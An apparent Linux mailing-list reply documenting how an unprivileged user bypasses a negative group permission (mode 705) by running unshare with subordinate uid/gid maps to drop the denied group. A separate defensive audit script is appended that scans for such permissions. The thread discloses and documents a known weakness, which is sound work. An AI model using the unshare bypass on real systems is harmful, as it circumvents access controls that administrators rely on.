From: Richard Weinberger
To: Alejandro Colomar
Cc: "Serge E. Hallyn", christian@brauner.io, ipedrosa@redhat.com, gscrivan@redhat.com, Andreas Grünbacher, acl-devel@nongnu.org, linux-man@vger.kernel.org, linux-api@vger.kernel.org, linux-fsdevel, ebiederm
Date: Tue, 29 Aug 2023 23:32:47 +0200 (CEST)
Subject: Re: [PATCH 0/3] Document impact of user namespaces and negative permissions
Message-ID: <1972367750.1870193.1693344767957.JavaMail.zimbra@nod.at>
In-Reply-To: <81098c50-bfec-9aa2-a302-abfebd0ff332@kernel.org>
References: <20230829205833.14873-1-richard@nod.at> <81098c50-bfec-9aa2-a302-abfebd0ff332@kernel.org>
List-ID: linux-fsdevel@vger.kernel.org

----- Original Mail -----
> From: "Alejandro Colomar"
> Can you please provide a small shell session where this is exemplified?

Sure. I sent the following to the shadow maintainers privately on Friday, but since the issue is already known for years I don't hesitate to share.

# On a Debian Bookworm

# So far no entries are installed.
$ cat /etc/subuid

# useradd automatically does so.
$ useradd -m rw
$ cat /etc/subuid
rw:100000:65536

# Let's create a folder where the group "nogames" has no permissions.
$ mkdir /games
$ echo win > /games/game.txt
$ groupadd nogames
$ chown -R root:nogames /games
$ chmod 705 /games

# User "rw" must not play games
$ usermod -G nogames rw

# Works as expected
rw@localhost:~$ id
uid=1000(rw) gid=1000(rw) groups=1000(rw),1001(nogames)
rw@localhost:~$ cat /games/game.txt
cat: /games/game.txt: Permission denied

# By using unshare (which utilizes the newuidmap helper) we can get rid of the "nogames" group.
rw@localhost:~$ unshare -S 0 -G 0 --map-users=100000,0,65536 --map-groups=100000,0,65536 id
uid=0(root) gid=0(root) groups=0(root)
rw@localhost:~$ unshare -S 0 -G 0 --map-users=100000,0,65536 --map-groups=100000,0,65536 cat /games/game.txt
win

Thanks,
//richard
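As an added audit helper (not from Richard's mail or the patch series), the script below flags filesystem entries whose group permissions are narrower than "other", the 705-style negative permission the session above relies on, and checks whether a user holds a subordinate id range in a subuid/subgid file, which is what newuidmap/newgidmap need before an unprivileged unshare like the one shown can drop the group. It assumes Linux with GNU find; the sample tree and subuid file are constructed.

```shell
#!/bin/sh
# Added audit helper, not part of the thread or the patch series.
# Assumes Linux with GNU find (for -printf); the sample tree is constructed.

# is_negative_perm OCTAL_MODE: succeed when "other" holds a permission bit
# that the group lacks, e.g. 705 (group denied, everyone else allowed).
is_negative_perm() {
    mode=$(( 0$1 ))                    # leading 0 forces octal
    group=$(( (mode >> 3) & 7 ))
    other=$(( mode & 7 ))
    [ $(( other & ~group & 7 )) -ne 0 ]
}

# scan_negative_perms DIR: print "MODE PATH" for every entry whose group
# permissions are narrower than "other". A group-based denial of this kind
# only holds while the process keeps the supplementary group, which the
# unshare invocation in the mail drops, so these are the entries to review.
scan_negative_perms() {
    find "$1" -printf '%m %p\n' 2>/dev/null | while read -r m p; do
        if is_negative_perm "$m"; then
            printf '%s %s\n' "$m" "$p"
        fi
    done
}

# has_subid_range USER FILE: succeed when FILE (normally /etc/subuid or
# /etc/subgid) grants USER a subordinate range, which newuidmap/newgidmap
# require before they will write a multi-id map for an unprivileged user.
has_subid_range() {
    grep -q "^$1:" "$2"
}

# demo_tree: build a constructed tree mirroring the /games example and
# print its root; the caller removes it.
demo_tree() {
    d=$(mktemp -d)
    mkdir "$d/games" "$d/public"
    echo win > "$d/games/game.txt"
    chmod 705 "$d/games"            # group "nogames" denied, others allowed
    chmod 755 "$d/public"           # ordinary, not negative
    chmod 640 "$d/games/game.txt"   # ordinary, not negative
    printf '%s\n' "$d"
}

# Stand-alone run: scan the constructed tree, then clean up.
root=$(demo_tree)
scan_negative_perms "$root"          # one line: "705 <root>/games"
rm -rf "$root"
```

Run it against a real tree with `scan_negative_perms /srv` and pair the output with `has_subid_range "$(id -un)" /etc/subuid` to see whether the bypass precondition is present on the host.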